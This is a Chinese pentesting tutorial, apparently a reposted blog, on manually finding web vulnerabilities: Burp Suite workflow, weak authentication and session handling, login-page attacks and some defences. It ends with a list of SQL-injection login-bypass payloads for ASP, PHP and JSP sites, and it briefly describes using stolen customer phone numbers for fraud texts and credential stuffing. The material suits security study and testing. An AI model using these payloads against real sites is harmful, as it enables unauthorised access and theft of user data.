web 渗透 --- 手动挖掘漏洞

手动漏洞挖掘的原则


  • 所有变量

  • 所有头

    Cookie的变量

  • 逐个变量删除

先手动进行爬网,过滤只有参数的页面

将页面发送至repeater模块,进行变量的逐个修改或删除

 burpsuit 中变量名为蓝色,值为红色,修改之后可以使用comparer模块进行比较

漏洞的本质


  • 数据与指令的混淆
  • 对用户输入信息过滤不严判断失误,误将指令当数据

身份认证漏洞


针对身份认证

  1. 使用常用弱口令/基于字典的密码暴力破解
  2. 测试是否锁定账号
  3. 测试基于手机号的用户名破解,可以在站内论坛收集用户信息
  4. 查看错误秘密提升信息,可以判断用户名或者密码错误
  5. 密码嗅探工具可以直接获取密码

会话 SessionID

  1. Xss / cookie importer
  2. SessionID in URL
  3. 使用嗅探工具.
  4. 测试 SessionID 是否是长期不变的
  5. 破译 SessionID 生成算法
    • Sequencer
    • 私有算法
    • 预判下一次登录时生成的 SessionID
    • 登出后返回测试

密码找回时的漏洞

  1. 在 URL 中存在密码的散列值,可以直接进行密码设置

登录界面

  1. 暴力破解
  2. SQL注入
  3. 万能密码(约等于SQL注入)
  4. 任意密码重置/任意用户注册
  5. 四位数的短信验证码
  6. 反馈过于详细

获取一个新用户的成本很高

如果我能得到公司的客户信息=手机号

  1. 假如我是竞争对手 给这些人发广告,告诉他们我这有好东西
  2. 假如我是做黑产的 给这些人发诈骗短信,钓鱼
  3. 撞库攻击

防御 用户名+手机号+短信验证码 相匹配

登录界面安全防御:

  1. 使用HTTPS,加密post包的密码
  2. 使用验证码
  3. 错误尝试5次后,锁定账户30分钟
  4. 高强度密码

 

 

万能密码:

asp、aspx、php、jsp万能密码大全

 

asp aspx万能密码

 

1:"or "a"="a

2: ')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13: 'OR 1=1%00

14: "or 1=1%00

15:'xor

16: 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)

密码 1

17..admin' or 'a'='a 密码随便

 

PHP万能密码

'or 1=1/*

User: something

Pass: ' or '1'='1

 

jsp 万能密码

1'or'1'='1

admin' or 1=1/*

猜你喜欢

转载自blog.csdn.net/qq389674856/article/details/82631872